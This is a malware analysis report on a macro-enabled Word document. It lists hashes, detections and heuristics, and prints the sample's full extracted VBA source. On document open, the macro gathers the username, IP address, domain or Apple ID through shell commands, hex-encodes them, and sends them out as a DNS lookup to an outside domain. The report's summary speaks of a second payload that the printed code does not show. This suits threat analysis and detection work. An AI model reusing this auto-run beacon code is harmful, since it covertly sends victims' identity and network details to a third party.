Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 b42cb0c75490854f…

MALICIOUS

Office (OOXML)

Size: 21.8 KB
Created: 2018-03-29 10:29:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-11-25
MD5: 3f6fc68ac6346e010116730f5b828d47
SHA-1: 48643773e51734081a373782e2a8e3a4484173b7
SHA-256: b42cb0c75490854f90e70d175ac120fe8484af6960d12fc35b04602f36df3a89
Risk Score: 378

Malware Insights

MITRE ATT&CK
  • T1059.005: Visual Basic
  • T1204.002: Malicious File
  • T1105: Ingress Tool Transfer

The sample contains VBA macros with a Document_Open auto-execution macro. This macro utilizes WScript.Shell to construct and attempt to execute a URL, likely to download and run a secondary payload. The presence of the 'SE_ENABLE_LURE' heuristic indicates the document likely prompts the user to enable macros, a common social engineering tactic.

Heuristics (10)

  • ClamAV: Doc.Malware.Valyria-10010011-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Valyria-10010011-0
  • VBA project inside OOXML [medium, 6 related findings] (OOXML_VBA)
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA [critical] (OLE_VBA_SHELL)
    Matched lines in script:
        Dim script As String
        RetVal = MacScript("do shell script ""route -n get default""")
        Interface = Split(Split(RetVal, vbCr)(4), ": ")(1)
  • WScript.Shell usage [critical] (OLE_VBA_WSCRIPT)
    Matched lines in script:
        Dim sArr() As String
        Set WshShell = VBA.CreateObject("WScript.Shell")
        Set oExec = WshShell.exec("ipconfig.exe")
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    Matched lines in script:
        Dim sArr() As String
        Set WshShell = VBA.CreateObject("WScript.Shell")
        Set oExec = WshShell.exec("ipconfig.exe")
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] (OLE_VBA_DOCOPEN)
    Matched lines in script:
        Attribute VB_Customizable = True
        Private Sub Document_Open()
            #If Mac Then
  • Environ() call (env variable access) [low] (OLE_VBA_ENVIRON)
    Matched lines in script:
        Dim sUsername As String
        sUsername = Environ$("USER")
        Mac_Get_Username = sUsername
  • Macro/content-enable lure [medium] (SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the URLs below were found in document text (OOXML body / shared strings):
      • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
      • http://schemas.microsoft.com/office/drawing/2014/chartex
      • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
      • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
      • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
      • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
      • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
      • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
      • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
      • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
      • http://schemas.openxmlformats.org/markup-compatibility/2006
      • http://schemas.microsoft.com/office/drawing/2016/ink
      • http://schemas.microsoft.com/office/drawing/2017/model3d
      • http://schemas.openxmlformats.org/officeDocument/2006/relationships
      • http://schemas.openxmlformats.org/officeDocument/2006/math
      • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
      • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
      • http://schemas.openxmlformats.org/wordprocessingml/2006/main
      • http://schemas.microsoft.com/office/word/2010/wordml
      • http://schemas.microsoft.com/office/word/2012/wordml
      • http://schemas.microsoft.com/office/word/2018/wordml/cex
      • http://schemas.microsoft.com/office/word/2016/wordml/cid
      • http://schemas.microsoft.com/office/word/2018/wordml
      • http://schemas.microsoft.com/office/word/2015/wordml/symex
      • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
      • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
      • http://schemas.microsoft.com/office/word/2006/wordml
      • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 6606 bytes
SHA-256: 2e188e110157f32231f8afed4df361b88370c096ebc23a6193761b82784912b1
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    #If Mac Then
        ip = Module1.Mac_Get_IP
        username = Module1.Mac_Get_Username
        appid = Module1.Mac_Get_AppleID
        request = Module1.Mangle_Request(appid, username, ip, "M")
    #Else
        ip = Module1.Windows_Get_IP
        username = Module1.Windows_Get_Username
        domain = Module1.Windows_Get_Domain
        request = Module1.Mangle_Request(domain, username, ip, "W")
    #End If
    Module1.Trigger_Token (request)
End Sub


Attribute VB_Name = "Module1"
Option Explicit

Public Const BASE = ".lye04n5skx8tl4ter9la0r0t5.49d185155faa.o3n.io..................................................................................................."
Public Const EOS = "..."

Public Function Trigger_Token(request As String)
    On Error GoTo Err_Trigger
    Application.Documents.CanCheckOut ("http://" & request)
    
Err_Trigger:
    Exit Function
    
End Function

Public Function Mac_Get_IP() As String
    On Error GoTo Err_IP
    Dim RetVal As String
    Dim Interface As String
    Dim Length As Integer
    Dim script As String
    RetVal = MacScript("do shell script ""route -n get default""")
    Interface = Split(Split(RetVal, vbCr)(4), ": ")(1)
    RetVal = MacScript("do shell script ""ifconfig " + Interface + " inet""")
    Mac_Get_IP = Split(Split(RetVal, "inet ")(1), " ")(0)
    
Exit_IP:
    Exit Function

Err_IP:
    Mac_Get_IP = "none"
    Resume Exit_IP
End Function

Public Function Mac_Get_AppleID() As String
    On Error GoTo Err_AppleID
    Dim RetVal As String
    Dim script As String
    #If MAC_OFFICE_VERSION >= 15 Then
        Dim User As String
        Dim Email As String
        Dim EmailArr() As String
        Dim Length As Integer
        User = MacScript("do shell script ""id -un"" ")
        script = "do shell script ""dscl . -read /Users/" & User & " RecordName"""
        RetVal = MacScript(script)
        EmailArr = Split(RetVal, " ")
        Length = UBound(EmailArr) - LBound(EmailArr) + 1
        Dim i As Integer
        For i = 0 To Length - 1
            If EmailArr(i) Like "*@*" Then
                RetVal = EmailArr(i)
                Exit For
            End If
        Next i
    #Else
        script = "tell application " & Chr(34) & "Mail" & Chr(34) & _
        " to get email addresses of every account"
        RetVal = MacScript(script)
    #End If
    Mac_Get_AppleID = Trim(RetVal)

Exit_AppleID:
    Exit Function

Err_AppleID:
    Mac_Get_AppleID = "none"
    Resume Exit_AppleID
    
End Function

Public Function Mac_Get_Username() As String
    On Error GoTo Err_Username
    Dim sUsername As String
    sUsername = Environ$("USER")
    Mac_Get_Username = sUsername
    
Exit_Username:
    Exit Function

Err_Username:
    Mac_Get_Username = "none"
    Resume Exit_Username
    
End Function

Public Function Windows_Get_IP() As String
    On Error GoTo Err_IP
    Dim WshShell As Object
    Dim oExec As Object
    Dim sOutput As String
    Dim sArr() As String
    Set WshShell = VBA.CreateObject("WScript.Shell")
    Set oExec = WshShell.exec("ipconfig.exe")
    oExec.StdIn.Write "/a"
    sOutput = oExec.StdOut.ReadAll()
    sArr = Split(Split(Split(sOutput, "IPv4 Address")(1), ":")(1), " ")
    Windows_Get_IP = Replace(Replace(Trim(sArr(1)), Chr(10), ""), Chr(13), "")
    
Exit_IP:
    Exit Function
    
Err_IP:
    Windows_Get_IP = "none"
    Resume Exit_IP
    
End Function

Public Function Windows_Get_Username() As String
    On Error GoTo Err_Username
    Dim sUsername As String
    sUsername = Environ$("username")
    Windows_Get_Username = sUsername
    
Exit_Username:
    Exit Function
    
Err_Username:
    Windows_Get_Username = "none"
    Resume Exit_Username
End Function

Public Function Windows_Get_Domain() As String
    On Error GoTo Err_Domain
    Dim WshShell As Object
    Dim oExec As Object
    Dim sOutput As String
    Dim sArr() As String
    Dim sErr As String
    Set WshShell = VBA.CreateObject("WScript.Shell")
    Set oExec = WshShell.exec("whoami /upn")
    Do While oExec.Status = 0
        DoEvents
    Loop
    sOutput = oExec.StdOut.ReadAll()
    sErr = oExec.StdErr.ReadAll()
    If sErr Like "*ERROR*" Then
        Set oExec = WshShell.exec("whoami /user /NH")
        sOutput = oExec.StdOut.ReadAll()
        Windows_Get_Domain = Trim(Split(sOutput, "\")(0))
    Else
        Windows_Get_Domain = Trim(Split(sOutput, "@")(1))
    End If
    
Exit_Domain:
    Exit Function

Err_Domain:
    Windows_Get_Domain = "none"
    Resume Exit_Domain
    
End Function

Public Function Mangle_Request(ByVal userData As String, ByVal username As String, ByVal ip As String, ByVal os As String) As String
    Dim sRequest As String
    Dim sMaxLength As Long
    Dim reducedBase As String
    reducedBase = Left(BASE, InStr(BASE, EOS) - 1)
    sRequest = EncodeHex(username, "") & ".u" & os & "." & EncodeHex(ip, "") & ".MW" & reducedBase
    sMaxLength = 250 - Len(sRequest)
    If Len(userData) > 0 Then
        sRequest = AddExtra(userData, sMaxLength) & ".d." & sRequest
    Else
        sRequest = EncodeHex("none", "") & ".d." & sRequest
    End If
    Mangle_Request = sRequest
End Function

Private Function AddExtra(userData As String, sMaxLength As Long) As String
    Dim i As Long
    Dim enLen As Long
    Dim sTestUrl As String
    Dim encoded As String
    Do
        sTestUrl = ""
        encoded = EncodeHex(userData, "")
        i = 1
        enLen = Len(encoded)
        Do While i < enLen
            If i + 62 > enLen Then
                sTestUrl = sTestUrl & Mid(encoded, i, enLen)
            Else
                sTestUrl = sTestUrl & Mid(encoded, i, 63) & "."
            End If
            i = i + 62
        Loop
        If Len(sTestUrl) <= sMaxLength Then
            Exit Do
        End If
        userData = Left(userData, Len(userData) - 2)
    Loop
    AddExtra = sTestUrl
End Function

Private Function EncodeHex(sData As String, Optional HexPrefix As String = "0x") As String
    Dim iChar As Integer
    Dim sOutString As String
    Dim sTmpChar As String
    sOutString = ""
    For iChar = 1 To Len(sData)
        sTmpChar = Hex$(Asc(Mid(sData, iChar, 1)))
        If Len(sTmpChar) = 1 Then sTmpChar = "0" & sTmpChar
        sOutString = sOutString & sTmpChar
    Next iChar
    EncodeHex = sOutString
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 22016 bytes
SHA-256: da6d31c8a750aabe90c47e2174d6b4970bec4a772f60e518f0adba5dfe853106
Detection
ClamAV: Doc.Malware.Valyria-10010011-0
Obfuscation or payload: unlikely